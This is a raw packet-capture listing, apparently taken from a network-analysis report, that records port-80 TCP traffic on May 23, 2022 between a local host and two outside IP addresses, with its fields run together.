                                  May 23, 2022 09:50:11.353344917 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353349924 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353365898 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353374958 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353393078 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353415012 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353420973 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353437901 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353452921 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353466988 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353472948 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353487968 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353498936 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353513956 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353523970 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353539944 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353553057 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353569031 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353574991 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353590965 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353600979 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353615999 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353625059 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353641033 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353650093 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353665113 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353688955 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353730917 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353748083 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353765011 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353775024 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353781939 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353800058 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353862047 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353889942 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353899002 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353925943 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.353952885 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353970051 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353986025 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.353996038 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354006052 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354022980 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354032040 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354064941 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354077101 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354094028 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354110956 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354121923 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354140043 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354146957 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354150057 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354180098 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354216099 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354259014 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354321957 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354340076 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354361057 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354368925 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354379892 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354397058 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354424000 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354441881 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354463100 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354468107 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354477882 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354491949 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354500055 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354526997 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354600906 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354624033 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354641914 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354651928 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354667902 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354676962 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354693890 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354701042 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354736090 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354753017 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354770899 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354784966 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354803085 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354815960 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354831934 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354852915 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354860067 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354863882 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354882956 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354899883 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354938030 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.354954958 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.354990005 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355000973 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355016947 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355037928 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355050087 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355062008 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355083942 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355099916 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355108976 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355118036 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355134010 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355154037 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355163097 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355249882 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355267048 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355283022 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355292082 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355308056 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355317116 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355323076 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355355978 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355442047 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355458021 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355485916 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355503082 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355518103 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355536938 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355545998 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355606079 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355623007 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355642080 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355648994 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355657101 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355673075 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355683088 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355707884 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355747938 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355762005 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355788946 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355798006 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355815887 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355833054 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355850935 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355858088 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355865002 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355879068 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355890989 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355910063 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355943918 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355961084 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355978966 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.355986118 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.355993986 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356008053 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356019974 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356044054 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356120110 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356136084 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356157064 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356163979 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356168032 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356184959 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356194019 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356220961 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356308937 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356327057 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356345892 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356352091 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356359959 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356374979 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356385946 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356405973 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356472969 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356511116 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356529951 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356539965 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356551886 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356574059 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356585026 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356626987 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356658936 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356676102 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356700897 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356714964 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356720924 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356739044 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356760025 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356767893 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356772900 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356790066 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356798887 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356827974 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356843948 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356872082 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356879950 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356901884 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356919050 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.356930971 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356947899 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356956005 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.356991053 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357007980 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357027054 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.357033014 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357042074 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.357058048 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357070923 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.357090950 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.357177973 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357194901 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357212067 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357222080 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.357228994 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.357244015 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:11.357251883 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:11.357280970 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:13.689610004 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.229441881 CEST804917366.71.247.68192.168.2.22
                                  May 23, 2022 09:50:16.229649067 CEST4917380192.168.2.2266.71.247.68
                                  May 23, 2022 09:50:16.683672905 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.715858936 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.716159105 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.716734886 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.745970011 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812772036 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812820911 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812838078 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812851906 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812869072 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812887907 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812906027 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812922001 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812939882 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.812958002 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.813025951 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.813723087 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.813743114 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.815844059 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842438936 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842468977 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842483997 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842516899 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842534065 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842550039 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842566013 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842581987 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842597961 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842614889 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842701912 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842746019 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842755079 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842803001 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842820883 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842837095 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842855930 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842868090 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842873096 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842883110 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842890978 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842899084 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842907906 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842925072 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842931986 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842941999 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842950106 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.842957973 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.842982054 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.843002081 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.843424082 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.872803926 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872833967 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872845888 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872860909 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872872114 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872884035 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872900009 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872917891 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872951031 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.872992039 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873014927 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873032093 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873028994 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873049974 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873066902 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873066902 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873073101 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873078108 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873083115 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873085022 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873086929 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873101950 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873106003 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873117924 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873121023 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873136997 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873136997 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873148918 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873155117 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873171091 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873173952 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873183966 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873187065 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873198986 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873204947 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873220921 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873236895 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873240948 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873249054 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873254061 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873255014 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873271942 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873279095 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873289108 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873290062 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873305082 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873306036 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873318911 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873323917 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873339891 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873357058 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873358011 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873367071 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873373032 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873388052 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873389006 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873404026 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873405933 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873419046 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873424053 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873440981 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873447895 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873456955 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873460054 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873473883 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873475075 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873487949 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873491049 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873508930 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.873514891 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873526096 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.873541117 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.874393940 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.902816057 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902864933 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902880907 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902895927 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902913094 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902930021 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902945042 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902961969 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902972937 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.902977943 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.902995110 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903009892 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903012991 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903017044 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903022051 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903026104 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903031111 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903031111 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903048992 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903053045 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903059959 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903064966 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903080940 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903080940 CEST8049174107.189.3.39192.168.2.22
                                  May 23, 2022 09:50:16.903125048 CEST4917480192.168.2.22107.189.3.39
                                  May 23, 2022 09:50:16.903131962 CEST4917480192.168.2.22107.189.3.39
